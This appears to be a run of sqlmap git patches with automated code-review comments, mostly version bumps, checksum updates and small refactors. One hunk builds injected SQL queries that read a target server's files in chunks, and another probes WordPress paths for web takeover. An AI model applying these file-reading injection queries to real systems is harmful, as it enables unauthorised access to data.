> 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2952a127f0b..88df01687a3 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -205,7 +205,7 @@ def webInit(self): if readInput(message, default='Y', boolean=True): headers = {} - been = set([conf.url]) + been = {conf.url} for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 6c844859474..10ba77a4b58 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py 
@@ -126,7 +126,7 @@ def crawlThread(): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() - threadData.shared.unprocessed = set([target]) + threadData.shared.unprocessed = {target} if not conf.sitemapUrl: message = "do you want to check for the existence of " diff --git a/lib/utils/har.py b/lib/utils/har.py index 4def9b3db45..19fc7b67807 100644 --- a/lib/utils/har.py +++ b/lib/utils/har.py @@ -180,7 +180,7 @@ def toDict(self): "size": len(self.content or "") } - binary = set(['\0', '\1']) + binary = {'\0', '\1'} if any(c in binary for c in self.content): content["encoding"] = "base64" content["text"] = base64.b64encode(self.content) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index dcc11bbb8e2..bafe2a80138 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -693,9 +693,7 @@ def hashRecognition(value): if isinstance(value, basestring): for name, regex in getPublicTypeMembers(HASH): # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: + if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD: continue elif regex == HASH.CRYPT_GENERIC: if any((value.lower() == value, value.upper() == value)): @@ -712,7 +710,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc count = 0 rotator = 0 - hashes = set([item[0][1] for item in attack_info]) + hashes = set(item[0][1] for item in attack_info) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) 
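Review bot: The merged condition `if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD:` in the hashRecognition hunk relies on `and` binding tighter than `or`; the result is correct, but the two clauses deserve parentheses so the precedence is explicit to the next reader: `if (isOracle and regex == HASH.MYSQL_OLD) or (isMySQL and regex == HASH.ORACLE_OLD):`. hashRecognition's body continues outside the hunk.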
@@ -758,7 +756,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) @@ -827,12 +825,14 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if user and not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user + status += " (user: %s)" % user if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 0b6190ae473..3983b6b30ca 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -60,13 +60,13 @@ def getBanner(self): bannerParser(kb.data.banner) if conf.os and conf.os == "windows": - kb.bannerFp["type"] = set(["Windows"]) + kb.bannerFp["type"] = {"Windows"} elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = set(["Linux"]) + kb.bannerFp["type"] = {"Linux"} elif conf.os: - kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) + kb.bannerFp["type"] = {"%s%s" % (conf.os[0].upper(), conf.os[1:])} if conf.os: setOs() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1365a2102ac..a9c50c7487b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -27d1b0a4609eece643141408d1f18716 lib/core/common.py +e4fa4177b9d3c24555fb275335496e29 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2ef6392db210a10901554ea061ee7256 lib/core/settings.py +4f27b5c4801cad5c6b8361f953a4f313 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -1398cb4ee55becf628367854b5310f33 lib/takeover/web.py +3972e3e00115c6e4e03336e23e35b1de lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 
@@ -100,12 +100,12 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py 918d6f34c415c578c2eae8730f555ae8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py +8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py -7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py +2384f77330583b53018a7dab5fc1c90f lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -578007a75d75a2e510a9ec33f01eeeb0 lib/utils/hash.py +29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py @@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py 315a3ced9667065b24de040af296037a plugins/generic/databases.py b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py -d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py +00e0b1b5713784c8131660bfc40bbaac plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py From 0a8bc52910d7dbcda9c8ddca7e4bdf88ca83b8aa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:13:08 +0100 Subject: [PATCH 018/428] Minor updates --- lib/core/option.py | 5 +++-- lib/core/settings.py | 2 +- lib/utils/api.py | 1 - plugins/dbms/mysql/filesystem.py | 9 ++++----- txt/checksum.md5 | 8 ++++---- 5 files changed, 12 insertions(+), 13 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 13b1103d4ef..ae27ae60aed 100644 --- a/lib/core/option.py 
+++ b/lib/core/option.py
@@ -1046,7 +1046,7 @@ def _setSocketPreConnect():
 if conf.disablePrecon:
 return
- def _():
+ def _thread():
 while kb.get("threadContinue") and not conf.get("disablePrecon"):
 try:
 for key in socket._ready:
@@ -1078,6 +1078,7 @@ def connect(self, address):
 break
 else:
 try:
+ candidate.shutdown(socket.SHUT_RDWR)
 candidate.close()
 except socket.error:
 pass
@@ -1090,7 +1091,7 @@ def connect(self, address):
 socket.socket._connect = socket.socket.connect
 socket.socket.connect = connect
- thread = threading.Thread(target=_)
+ thread = threading.Thread(target=_thread)
 setDaemon(thread)
 thread.start()
diff --git a/lib/core/settings.py b/lib/core/settings.py
index e0b9fe0158c..e7c146c2015 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.1.21"
+VERSION = "1.2.1.22"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 5aea6ae2b18..28f0a6c26f9 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -45,7 +45,6 @@ from lib.core.settings import RESTAPI_DEFAULT_PORT
 from lib.core.subprocessng import Popen
 from lib.parse.cmdline import cmdLineParser
-from thirdparty.bottle.bottle import abort
 from thirdparty.bottle.bottle import error as return_error
 from thirdparty.bottle.bottle import get
 from thirdparty.bottle.bottle import hook
diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py
index cebeca56bf6..d28d1231283 100644
--- a/plugins/dbms/mysql/filesystem.py
+++ b/plugins/dbms/mysql/filesystem.py
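Review bot: Placing `candidate.shutdown(socket.SHUT_RDWR)` in the same try as `candidate.close()` means that when shutdown raises socket.error (which it can for a pre-connected socket whose peer has already gone away, for instance) the except swallows it and close() is never reached, so the descriptor leaks on exactly the path this cleanup exists for. Give each call its own try/except so close() always runs regardless of how shutdown fares. The enclosing connect() starts and ends outside the hunk.
```python
else:
    try:
        candidate.shutdown(socket.SHUT_RDWR)
    except socket.error:
        pass
    try:
        candidate.close()
    except socket.error:
        pass
```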
@@ -68,14 +68,13 @@ def stackedReadFile(self, rFile): raise SqlmapNoneDataException(warnMsg) else: length = int(length) - sustrLen = 1024 + chunkSize = 1024 - if length > sustrLen: + if length > chunkSize: result = [] - for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - + for i in xrange(1, length, chunkSize): + chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result.append(chunk) else: result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a9c50c7487b..1eb37c21c0b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -ac01954e9881b5ba6e41b85e6c08bd9a lib/core/option.py +598863f3b058650c17f465b16892dc67 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4f27b5c4801cad5c6b8361f953a4f313 lib/core/settings.py +7fc35bef60750c8ba2475c154d7d481c lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py 
@@ -98,7 +98,7 @@ f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py -918d6f34c415c578c2eae8730f555ae8 lib/utils/api.py +e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py @@ -168,7 +168,7 @@ affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py +f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py 2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py From 10fd004dece3a9ce37d09497deec5ba1b4cc042a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:24:28 +0100 Subject: [PATCH 019/428] Reverting set() brace form because of Python 2.6 compatibility issues --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/takeover/web.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/har.py | 2 +- plugins/generic/enumeration.py | 6 +++--- sqlmap.py | 3 +++ txt/checksum.md5 | 14 +++++++------- 8 files changed, 18 insertions(+), 15 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a18daef0613..63d5f36cd31 100644 --- a/lib/core/common.py +++ b/lib/core/common.py 
@@ -770,7 +770,7 @@ def getManualDirectories(): checkFile(listPath) directories = getFileItems(listPath) elif choice == '4': - targets = {conf.hostname} + targets = set([conf.hostname]) _ = conf.hostname.split('.') if _[0] == "www": diff --git a/lib/core/settings.py b/lib/core/settings.py index e7c146c2015..6600deb9cad 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.22" +VERSION = "1.2.1.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 88df01687a3..2952a127f0b 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -205,7 +205,7 @@ def webInit(self): if readInput(message, default='Y', boolean=True): headers = {} - been = {conf.url} + been = set([conf.url]) for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 10ba77a4b58..6c844859474 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -126,7 +126,7 @@ def crawlThread(): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() - threadData.shared.unprocessed = {target} + threadData.shared.unprocessed = set([target]) if not conf.sitemapUrl: message = "do you want to check for the existence of " diff --git a/lib/utils/har.py b/lib/utils/har.py index 19fc7b67807..4def9b3db45 100644 --- a/lib/utils/har.py +++ b/lib/utils/har.py 
@@ -180,7 +180,7 @@ def toDict(self): "size": len(self.content or "") } - binary = {'\0', '\1'} + binary = set(['\0', '\1']) if any(c in binary for c in self.content): content["encoding"] = "base64" content["text"] = base64.b64encode(self.content) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 3983b6b30ca..0b6190ae473 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -60,13 +60,13 @@ def getBanner(self): bannerParser(kb.data.banner) if conf.os and conf.os == "windows": - kb.bannerFp["type"] = {"Windows"} + kb.bannerFp["type"] = set(["Windows"]) elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = {"Linux"} + kb.bannerFp["type"] = set(["Linux"]) elif conf.os: - kb.bannerFp["type"] = {"%s%s" % (conf.os[0].upper(), conf.os[1:])} + kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) if conf.os: setOs() diff --git a/sqlmap.py b/sqlmap.py index a0dcdb8329b..0c1e160f8fa 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -381,3 +381,6 @@ def main(): if __name__ == "__main__": main() +else: + # cancelling postponed imports (because of Travis CI checks) + from lib.controller.controller import start \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1eb37c21c0b..c114b5544ce 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -e4fa4177b9d3c24555fb275335496e29 lib/core/common.py +27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
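Review bot: The new `else:` branch in sqlmap.py ends with `\ No newline at end of file`, so the added import line lacks a trailing newline; add one. The imported name `start` is not used anywhere in the hunk, and `# cancelling postponed imports (because of Travis CI checks)` does not say what the import is for — presumably it is there so lib.controller.controller gets loaded when sqlmap.py is imported as a module under CI; if so, a comment such as `# imported for its side effect only: load lib.controller.controller when sqlmap is imported as a module (Travis CI checks)` would tell the next reader why an apparently unused import must stay. main()'s definition is outside the hunk.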
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7fc35bef60750c8ba2475c154d7d481c lib/core/settings.py +ee202f91d95b559f4cd9355f55203946 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -3972e3e00115c6e4e03336e23e35b1de lib/takeover/web.py +1398cb4ee55becf628367854b5310f33 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py @@ -100,10 +100,10 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py +a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py -2384f77330583b53018a7dab5fc1c90f lib/utils/har.py +7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py 29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 
@@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py 315a3ced9667065b24de040af296037a plugins/generic/databases.py b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py -00e0b1b5713784c8131660bfc40bbaac plugins/generic/enumeration.py +d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py @@ -224,7 +224,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_ 1f7f125f30e0e800beb21e2ebbab18e1 shell/stagers/stager.jsp_ 01e3505e796edf19aad6a996101c81c9 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -1bef42b51e59db28d04181955c405931 sqlmap.py +3e2e790c370442c3d98eaa88a3523b15 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py 4b1024cecb00f13a4e1be78391e9cedb tamper/appendnullbyte.py From be7711bcdb714df29101ebcb920ba322ed2697a1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:29:53 +0100 Subject: [PATCH 020/428] Minor patch related to the #2900 --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6600deb9cad..b390ec1f6ec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.23" +VERSION = "1.2.1.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 4116d4d5e2f..61f92b6ef49 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -223,7 +223,7 @@ def validateChar(idx, value): result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - if result and timeBasedCompare: + if result and timeBasedCompare and kb.injection.data[kb.technique].trueCode: result = threadData.lastCode == kb.injection.data[kb.technique].trueCode if not result: warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c114b5544ce..9f4377ab893 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ee202f91d95b559f4cd9355f55203946 lib/core/settings.py +b4bf9b1d887a7f992c1096132a0bec68 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -87,7 +87,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 1398cb4ee55becf628367854b5310f33 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py -f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py +b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py From 9e75bb7f689b87f405531701d4eb8bee0adb2ed7 Mon Sep 17 00:00:00 2001 
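Review bot: The new condition reads `kb.injection.data[kb.technique].trueCode`, and the two lines that follow read it twice more; binding it once, `trueCode = kb.injection.data[kb.technique].trueCode`, and writing `if result and timeBasedCompare and trueCode:` keeps the three references in step. A one-line comment such as `# no reference HTTP code was recorded for this technique, so code-based validation is skipped` would also help, since the added guard otherwise reads like a plain null check rather than a deliberate degradation of the validation step. `validateChar` starts before the hunk.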
From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:43:17 +0100 Subject: [PATCH 021/428] Minor patch --- lib/controller/checks.py | 13 ++++++------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 10 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 7af2e01ea57..ff238e9783c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1461,11 +1461,11 @@ def checkNullConnection(): infoMsg = "testing NULL connection to the target URL" logger.info(infoMsg) - try: - pushValue(kb.pageCompress) - kb.pageCompress = False + pushValue(kb.pageCompress) + kb.pageCompress = False - page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) + try: + page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False) if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD @@ -1489,9 +1489,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, ex: - errMsg = getSafeExString(ex) - raise SqlmapConnectionException(errMsg) + except SqlmapConnectionException: + pass finally: kb.pageCompress = popValue() diff --git a/lib/core/settings.py b/lib/core/settings.py index b390ec1f6ec..e844d0f6a11 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.24" +VERSION = "1.2.1.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9f4377ab893..f7416cc568d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
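Review bot: `except SqlmapConnectionException: pass` in the checks.py hunk drops the error entirely, so when the HEAD probe fails the user gets no hint why NULL connection support was not enabled; the removed lines at least carried the message. Logging it at debug level keeps the new best-effort behaviour while leaving a trace: `except SqlmapConnectionException, ex:` followed by `logger.debug("NULL connection check failed (%s)" % getSafeExString(ex))`. `getSafeExString` was in scope for the removed lines, so this should need no new import; the rest of `checkNullConnection` is outside the hunk.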
